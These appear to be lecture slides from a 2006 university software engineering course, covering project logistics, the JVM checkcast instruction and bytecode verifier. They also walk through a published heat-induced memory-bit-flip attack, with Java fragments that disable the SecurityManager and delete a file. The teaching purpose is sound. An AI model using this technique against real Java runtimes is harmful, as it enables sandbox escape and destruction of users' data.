Reasoning about Data Abstractions

1
cs205 engineering software university of
virginia fall 2006
Hair-Dryer Attacks
Image from www.clean-funny.com, GoldenBlue LLC.
2
Project Design Documents

• A description of your project what it will do
  and why it is useful, fun, or interesting.
• A high-level description of your design,
  including a module dependency diagram showing the
  most important modules.
• A description of your implementation and testing
  strategy including
• how you will divide the work amongst your team
• how you will order the work to support
  incremental development
• how you will do unit testing and integration
  testing
• a list of milestones and a schedule for achieving
  them, leading to a completed project on December
  4
• A list of questions

3
Fridays Class

• Project Design Documents due at beginning of
  class
• Class will be at Undergraduate Research Symposium
  Harrison Special Collections Library
• 100pm Adrienne Felt, Disk-Level Malware
  Detection
• other talks Candomblé and Healthcare in Bahia,
  An Investigation of the Medical Atmosphere in
  South Africa the Role of Community Home-Based
  Caregivers

4
Quiz

• Everyone got 0xCAFEBABE
• 3 people sort of got question 6 (full credit if
  your answer convinced me youd looked at the ps5
  comments)
• Ill ask a question on the final (open notes)
  about this same question, so make sure you
  understand it before then.

5
Teammate Assessment

• Your answers
• Mostly fair share of work, quality of work
• Did anybody make a huge breakthrough with some
  great idea that made everything else go
  smoother/faster?
• Being a good teammate is more...
• Responsibility takes responsibility for parts of
  the project and follows through
• Reliability comes to meetings on time
• Cooperative listens to teammates, willing to
  discuss things respectfully and come to a shared
  decision

6
Future Topics

• write-ins
• GUI programming and design (4 people)
• network programming (2 people)
• I think I have seen enough. )
• Famous Software Disasters (everyone ranked, 1 2 2
  2 5 6 7 7 9)
• Web Programming (1 1 1 1 2 2 4 6)
• C (1 1 1 3 4), Different Programming Languages
  (4 5 6 7)
• Performance (3 3 3 3 4 6 10)

7
checkcast

• No one had a good answer to the checkcast
  question
• Explain what the checkcast instruction does? vs
  Write a specification for the checkcast
  instruction

8
Pseudo-method Specification

• instruction checkcast (Stack s, Type t)
• throws CheckCastException
• REQUIRES s must contain at least
• one element, and the top of s
• must be an object reference
• MODIFIES nothing
• EFFECTS If the object on the top of the
• stack could be used where a type t is
• expected, no effects. Otherwise, throws
• CheckCastException.

9
checkcast Operation Check whether object is of
given type
Format
checkcast
indexbyte1
indexbyte2
checkcast Operation Check whether object is
of given type Format checkcast
indexbyte1 indexbyte2 Forms checkcast
192 (0xc0) Operand Stack ..., objectref
?  ..., objectref DescriptionThe objectref
must be of type reference. The unsigned
indexbyte1 and indexbyte2 are used to construct
an index into the runtime constant pool of the
current class (3.6), where the value of the
index is (indexbyte1 ltlt 8) indexbyte2. The
runtime constant pool item at the index must be a
symbolic reference to a class, array, or
interface type. The named class, array, or
interface type is resolved (5.4.3.1).
Java VM Specification http//java.sun.com/docs/boo
ks/vmspec/2nd-edition/html/Instructions2.doc2.html
10

• If objectref is null or can be cast to the
  resolved class, array, or interface type, the
  operand stack is unchanged otherwise, the
  checkcast instruction throws a ClassCastException.
  
• The following rules are used to determine whether
  an objectref that is not null can be cast to the
  resolved type if S is the class of the object
  referred to by objectref and T is the resolved
  class, array, or interface type, checkcast
  determines whether objectref can be cast to type
  T as follows
• If S is an ordinary (nonarray) class, then
• If T is a class type, then S must be the same
  class (2.8.1) as T, or a subclass of T.
• If T is an interface type, then S must implement
  (2.13) interface T.
• If S is an interface type, then
• If T is a class type, then T must be Object
  (2.4.7).
• If T is an interface type, then T must be the
  same interface as S or a superinterface of S
  (2.13.2).
• If S is a class representing the array type SC,
  that is, an array of components of type SC, then
  ...

11

• If S is a class representing the array type SC,
  that is, an array of components of type SC, then
  
• If T is a class type, then T must be Object
  (2.4.7).
• If T is an array type TC, that is, an array of
  components of type TC, then one of the following
  must be true
• TC and SC are the same primitive type (2.4.1).
• TC and SC are reference types (2.4.6), and type
  SC can be cast to TC by recursive application of
  these rules.
• If T is an interface type, T must be one of the
  interfaces implemented by arrays (2.15).
• Linking Exceptions
• During resolution of the symbolic reference to
  the class, array, or interface type, any of the
  exceptions documented in Section 5.4.3.1 can be
  thrown.
• Runtime Exception
• Otherwise, if objectref cannot be cast to the
  resolved class, array, or interface type, the
  checkcast instruction throws a ClassCastException.
  
• Notes
• The checkcast instruction is very similar to the
  instanceof instruction. It differs in its
  treatment of null, its behavior when its test
  fails (checkcast throws an exception, instanceof
  pushes a result code), and its effect on the
  operand stack.

12
Quiz 3

• Which of these components are part of the trusted
  computing base when a user runs a Java applet in
  a web page? Components applet source code,
  applet class file, Java compiler, Java bytecode
  verifier, Java VM.

13
Java Security
javac Compiler
malcode.java
malcode.class JVML
Java Bytecode Verifier
Invalid
Trusted Computing Base
Okay
STOP
JavaVM
14
Simulating All Paths

• The bytecode verifier verifies type safety for
  all possible executions of the program
• Since there are infinitely many paths through the
  program, how is this possible?

15
Verifier (should be) Conservative
JVML programs
Safe programs
Verifiable programs
(Slide from Nate Pauls ACSAC talk)
16
Complexity Increases Risk
JVML programs
Safe programs
Verifiable programs
Bug
(Slide from Nate Pauls ACSAC talk)
17
Vulnerabilities in JavaVM
45
40
35
30
25
Vulnerabilities Reported
20
15
10
5
0
0
1
2
3
4
5
6
7
8
9
Years Since First Release
July 1996
July 2005
18
Where are They?
Verification 12
API bugs 10
Class loading 8
Other or unknown 2
Missing policy checks 3
Configuration 4
DoS attacks (crash, consumption) 5
several of these were because of jsr complexity
19
SummaryLow-level vs. Policy Security

• Low-level Code Safety
• Type safety, memory safety, control flow safety
• Needed to prevent malcode from circumventing any
  policy mechanism
• Policy Security
• Control access and use of resources (files,
  network, display, etc.)
• Enforced by Java class
• Hard part is deciding on a good policy

20
Bytecode Verifier

• Checks JVML code satisfies safety properties
• Simulates program execution to know types are
  correct, but doesnt need to examine any
  instruction more than once
• After code is verified, it is trusted is not
  checked for type safety at run time (except for
  casts, array stores)

Key assumption when a value is written to a
memory location, the value in that memory
location is the same value when it is read.
21
Violating the Assumption
// The object on top of the stack is a
SimObject astore_0 // There is a SimObject in
location 0 aload_0 // The value on top of the
stack is a SimObject
If a cosmic ray hits the right bit of memory,
between the store and load, the assumption might
be wrong.
22
Improving the Odds

• Set up memory so that a single bit error is
  likely to be exploitable
• Mistreat the hardware memory to increase the odds
  that bits will flip

Following slides adapted (with permission) from
Sudhakar Govindavajhala and Andrew W. Appel,
Using Memory Errors to Attack a Virtual Machine,
July 2003.
23
Making Bit Flips Useful
Fill up memory with Filler objects, and one
Pointee object
class Filler class Pointee Pointee a1
Pointee a1 Pointee a2 Pointee a2
Pointee a3 Filler f Pointee a4
int b Pointee a5 Pointee
a5 Pointee a6 Pointee a6 Pointee
a7 Pointee a7
24
Filling Up Memory
a1
a2
a3
a4
Filler Object
a5
a6
Pointee p new Pointee () Vector fillers new
Vector () try while (true)
Filler f new Filler () f.a1 p f.a2
p f.a3 p f.a7 p fillers.add (f)
catch (OutOfMemoryException e)
a7
a1
a2
f
Pointee Object
b
a5
a6
a7
a1
Filler Object
a2
a3
a4
a5
a6
a7
25
Wait for a bit flip
a1
a2
a3
a4
Filler Object
a5

• Remember there are lots of Filler objects (fill
  up all of memory)
• If a bit flips, good chance (70) it will be in
  a field of a Filler object and it will now point
  to a Filler object instead of a Pointee object

a6
a7
a1
a2
f
Pointee Object
b
a5
a6
a7
a1
Filler Object
a2
a3
a4
a5
a6
a7
26
Type Violation
a1
a2
a3
a4
Filler Object
a5

• After the bit flip, the
• value of f.a2 is a
• Filler object, but
• f.a2 was declared
• as a Pointee object!

a6
a7
a1
a2
f
Pointee Object
b
a5
a6
Can an attacker exploit this?
a7
a1
Filler Object
a2
a3
a4
a5
a6
a7
27
Finding the Bit Flip
Pointee p new Pointee () Vector fillers new
Vector () try while (true)
Filler f new Filler () f.a1 p f.a2
p f.a3 p f.a7 p fillers.add (f)
catch (OutOfMemoryException e)
while (true) for (Enumeration e
fillers.elements () e.hasMoreElements
() ) Filler f (Filler) e.nextElement
() if (f.a1 ! p) // bit flipped!
else if (f.a2 ! p)

28
Violating Type Safety
class Filler class Pointee Pointee a1
Pointee a1 Pointee a2 Pointee a2
Pointee a3 Filler f
Pointee a4 int b Pointee
a5 Pointee a5 Pointee a6 Pointee
a6 Pointee a7 Pointee a7
Filler f (Filler) e.nextElement () if
(f.a1 ! p) // bit flipped! Object r
f.a1 // Filler fr (Filler) r //
Cast is checked at run-time
Declared Type f.a1 Pointee
f.a1.b int fr f.a1 Filler fr.a4
f.a1.b Pointee
29
Violating Type Safety
class Filler class Pointee Pointee a1
Pointee a1 Pointee a2 Pointee a2
Pointee a3 Filler f
Pointee a4 int b Pointee
a5 Pointee a5 Pointee a6 Pointee
a6 Pointee a7 Pointee a7
Filler f (Filler) e.nextElement () if (f.a1
! p) // bit flipped! Object r f.a1 //
Filler fr (Filler) r // Cast is checked
at run-time f.a1.b 1524383 // Address
of the SecurityManager fr.a4.a1 null
// Set it to a null // Do whatever you
want! No security policy now new File
(C\thesis.doc).delete ()
30
Getting a Bit Flip

• Wait for a Cosmic Ray
• You have to be really, really patient (or move
  machine out of Earths atmosphere)
• X-Rays
• Expensive, not enough power to generate bit-flip
• High energy protons and neutrons
• Work great - but, you need a particle accelerator
• Hmm.

31
Using Heat

• 50-watt spotlight bulb
• Between 80 -100C, memory starts to have a few
  failures
• Attack applet is successful (at least half the
  time)!
• Hairdryer works too, but it fries too many bits
  at once

Picture from Sudhakar Govindavajhala
32
Should Anyone be Worried?
Java virtual machine
33
Recap

• Verifier assumes the value you write is the same
  value when you read it
• By flipping bits, we can violate this assumption
• By violating this assumption, we can violate type
  safety get two references to the same storage
  that have inconsistent types
• By violating type safety, we can get around all
  other security measures
• For details, see paper linked from notes

34
Charge

• Project design documents due Friday
• Class will be at URN in Harrison Special
  Collections Library